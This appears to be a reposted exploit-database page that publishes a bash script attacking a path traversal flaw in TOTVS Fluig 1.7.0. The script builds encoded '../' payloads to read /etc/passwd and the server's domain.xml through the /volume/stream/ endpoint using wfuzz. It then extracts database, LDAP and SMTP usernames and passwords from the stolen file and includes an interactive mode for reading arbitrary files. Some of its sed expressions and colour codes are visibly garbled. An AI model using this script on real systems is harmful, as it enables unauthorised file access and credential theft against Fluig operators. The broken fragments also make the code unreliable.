Fluig 1.7.0 – Path Traversal – Digitalmunition




Exploit/Advisories spider-orange.png

Published on March 5th, 2021 📆 | 8382 Views ⚑

0

Fluig 1.7.0 – Path Traversal

# Exploit Title: Fluig 1.7.0 - Path Traversal
# Date: 26/11/2020
# Exploit Author: Lucas Souza
# Vendor Homepage: https://www.totvs.com/fluig/
# Version: < == 1.7.0-210217
# Tested on: 1.7.0-201124

#!/bin/bash
url="$1"
npayload=$2
> payload.txt
curl -s https://raw.githubusercontent.com/lucxssouza/banners/main/xFluig/banner > banner
# -- FUNCTIONS --

function create-payload {
    > wordlist.txt
    count=1
    while [[ $count -le $npayload ]]; do
                                                                        # WINDOWS PAYLOAD
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../users/public/desktop/desktop.ini" >> wordlist.txt
                                                                        # LINUX PAYLOAD
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../etc/passwd" >> wordlist.txt
        echo "?t=1&vol=Default&id=$count&ver=1000&file=../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
        count=$[$count + 1]
    done
}

function manual-mode {
    while :; do
        echo
        echo -e "33[0;31m[!] VALID MANUAL MODE COMMANDS33[0m"
        echo
        echo -e "33[0;32m   -[ clear          -     Clear Screen33[0m"
        echo -e "33[0;32m   -[ target         -     Set a target33[0m"
        echo -e "33[0;32m   -[ director/file  -     Ex: /etc/passwd33[0m"
        echo -e "33[0;32m   -[ info           -     Target info and parse 'domain.xml' file ( require target )33[0m"
        echo
        echo -n -e "33[0;31mMANUAL MODE >>33[0m "; read -r input2
        path=$(echo $input2 | sed 's/\///g' | tr '[:upper:]' '[:lower:]')
        mkfile=$(echo $path | sed 's///-/g' | sed 's/-//' | tr '[:upper:]' '[:lower:]')
        if [[ $path == 'info' ]]; then
            clear
            cat banner
            domain-xml
        elif [[ $path == 'clear' ]]; then
            clear
        elif [[ $path == 'target' ]]; then
            XmlPayload=''
            echo
            echo -n -e "33[0;31mINSERT TARGET >> 33[0m"; read url
            echo -n -e "33[0;31mWORDLIST SIZE >> 33[0m"; read -i npayload
            enum
       else
           echo
           echo "$param../../../../../../../../../../../../..$path" > wordlist.txt
           wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f2 | grep 200 | cut -d'"' -f2 > payload.txt
           DirPath=$(head -1 payload.txt)
       if [[ $DirPath  == '' ]]; then
           echo
           echo -e '            33[0;33m[!] COMMAND OR DIRECTORY/FILE NOT FOUND - TYPE HELP33[0m'
       else
           curl -s $url/volume/stream/Rmx1aWc=/$DirPath > report/$mdr/$mkfile
           echo
           echo -e '33[0;31m'$path'33[0m'
           echo
           cat report/$mdr/$mkfile
           echo
           pwd=$(pwd)
           echo
           echo -e '33[0;33m'[!] FILE SAVE IN, $pwd/report/$mdr/$mkfile'33[0m'
      fi
      fi
    done
}

function domain-xml {
    domain=$(ls report/$mdr | grep domain.xml)
if [[ $domain == '' ]]; then
    echo
    echo -e '33[0;33m[!] DOMAIN.XML FILE NOT FOUND33[0m'
else
    echo
    echo -e '     33[0;32m | TOTVS FLUIG - [+] XML ANALISYS33[0m'
    echo
    echo -e '            33[0;33m[!] INFORMATION33[0m'
    echo
    curl -s -I $url | grep Server
    echo
    echo -e '33[0;31mTarget33[0m'
    echo $url
    echo
    echo -e '33[0;31mPayload plaintext33[0m'
    echo $XmlPayload | base64 -d
    echo
    echo
    echo -e '33[0;31mPayload base64 encoded33[0m'
    echo $XmlPayload
    echo
    echo -e '            33[0;31m[!] DATABASE CONNECTIONS FOUNDS33[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep connection-url | sed 's//o033[0;31mDB CONNECT >> o033[0m/g' | sed 's/< /connection-url>/ o033[0;31m< < o033[0m/g' | sed 's/${env.FLUIG_DATABASE_URL://g' | sed 's/}//g'
    echo
    echo -e '            33[0;31m[!] USERS/PASSWORDS FOUNDS33[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep user-name | sed 's// o033[0;31mUSER >> o033[0m/g' | sed 's/< /user-name>/ o033[0;31m< < o033[0m /g' | sed 's/${env.FLUIG_DATABASE_USER://g' | sed 's/}//g' 
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep password'>' | sed 's//o033[0;31m PASSWORD >> o033[0m/g' | sed 's/< /password>/ o033[0;31m< < o033[0m/g' | sed 's/${env.FLUIG_DATABASE_PASSWORD://g' | sed 's/}//g'
    echo
    echo -e '            33[0;31m[!] LDAP INTEGRATIONS33[0m'
    echo 
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep ldap:// | sed 's/> o033[0m/g' | sed 's/"/>/ o033[0;31m< < o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep baseCtxDN | sed 's/> o033[0m/g' | sed 's/"/>/ o033[0;31m< < o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.principal | sed 's/> o033[0m/g' | sed 's/"/>/ o033[0;31m< < o033[0m /g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep security.credentials | sed 's/> o033[0m/g' | sed 's/"/>/ o033[0;31m< < o033[0m /g'
    echo
    echo -e '            33[0;31m[!] SMTP SETTINGS33[0m'
    echo
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep remote-destination | sed 's/> o033[0m/g' | sed 's//>/ o033[0;31m< < o033[0m /g' | sed 's/${env.FLUIG_SMTP_HOST://g' | sed 's/${env.FLUIG_HOST_ADDRESS://g' | sed 's/${env.FLUIG_SMTP_PORT//g'| sed 's/}//g'
    cat report/$mdr/domain.xml | sed 's/[[:blank:]]//g' | grep smtp-server | sed 's///g' | sed 's/password="/o033[0;31mPASSWORD >> o033[0m/g' | sed 's/"username="/o033[0;31m USER >> o033[0m/g' | sed 's/}//g' | sed 's/${env.FLUIG_SMTP_USERNAME://g' | sed 's/${env.FLUIG_SMTP_PASSWORD://g'
    echo
    manual-mode
fi
}

function enum {
mdr=$(echo $url | sed 's/https:////' | sed 's/http:////' | sed 's////')
mkdir -p report/$mdr
    if [[ $url == '' ]]; then
        clear
        cat banner
        echo -e '   33[0;31m-[  Usage Ex1: ./xfluig.sh FLUIG_ADDRESS REQUESTS_WFUZZ33[0m'
        echo -e '   33[0;31m-[        Ex2: ./xfluig.sh FLUIG_ADDRESS:PORT REQUESTS_WFUZZ33[0m'
        echo -e '   33[0;31m-[           ( ./xfluig.sh fluig.host.com:8080 1000 )33[0m'
        manual-mode
    elif [[ $npayload == '' ]]; then
        npayload=25
        clear
        cat banner
        echo -e ' 33[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION33[0m'
        echo
        echo -e '33[0;31m[>>] GENERATING PAYLOAD WORDLIST33[0m'
        echo
        create-payload
    else
        clear
        cat banner
        echo -e '     33[0;32m | TOTVS FLUIG - [+] PATH ENUMERATION33[0m'
        echo
        echo -e '33[0;31m[>>] GENERATING PAYLOAD WORDLIST33[0m'
        create-payload
    fi
echo
echo -e '33[0;31m[>>] RUNNING WFUZZ - WAIT33[0m'
echo
wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
payload=$(head -1 payload.txt)
if [[ $payload == '' ]]; then
    clear
    cat banner
    echo -e '  33[0;32m | TOTVS FLUIG -  PATH ENUMERATION AND XML ANALISYS 33[0m'
    echo
    echo -e '33[0;33m[!] DIRECTORY/FILE NOT FOUND OR TARGET NOT VULNERABLE33[0m'
    echo
    manual-mode
else
    param=$(echo $payload | base64 -d |  cut -d '.' -f1)
    clear
    cat banner
    echo -e '     33[0;32m | TOTVS FLUIG - [+] STATUS33[0m'
    echo
    echo -e '            33[0;33m[!] VULNERABLE33[0m'
    echo
    echo -e '33[0;31m[>>] SEARCHING DOMAIN.XML FILE33[0m'
    echo "$param../../../../../../../../../../../../../fluig/appserver/domain/configuration/domain.xml" > wordlist.txt
    echo "$param../../../../../../../../../../../../../opt/fluig/appserver/domain/configuration/domain.xml" >> wordlist.txt
    wfuzz -z file --zP fn=wordlist.txt,encoder=base64 -c --sc 200 $url/volume/stream/Rmx1aWc=/FUZZ | grep '"' | cut -d':' -f3 | grep 200 | cut -d'"' -f2 > payload.txt
    clear
    cat banner
    echo -e '     33[0;32m | TOTVS FLUIG - [+] STATUS33[0m'
    echo
    echo -e '            33[0;33m[!] VULNERABLE33[0m'
    echo
    curl -s -I $url | grep Server
    echo
    echo -e '33[0;31mTarget33[0m'
    echo $url
    echo
    echo -e '33[0;31mPayload plaintext33[0m'
    echo $payload | base64 -d
    echo
    echo
    echo -e '33[0;31mPayload base64 encoded33[0m'
    echo $payload
    echo
fi
XmlPayload=$(head -1 payload.txt)
if [[ $XmlPayload == '' ]]; then
    echo
    echo -e '33[0;33m[!] DOMAIN.XML FILE NOT FOUND33[0m'
    manual-mode
else
    curl -s $url/volume/stream/Rmx1aWc=/$XmlPayload | sed 's/[[:blank:]]//g' > report/$mdr/domain.xml
    echo
    echo -e '33[0;33m[!] DOMAIN.XML FILE FOUND - TYPE "INFO" TO PARSE33[0m'
    manual-mode
fi
}
enum
            

Source link

Tagged with:



Leave a Reply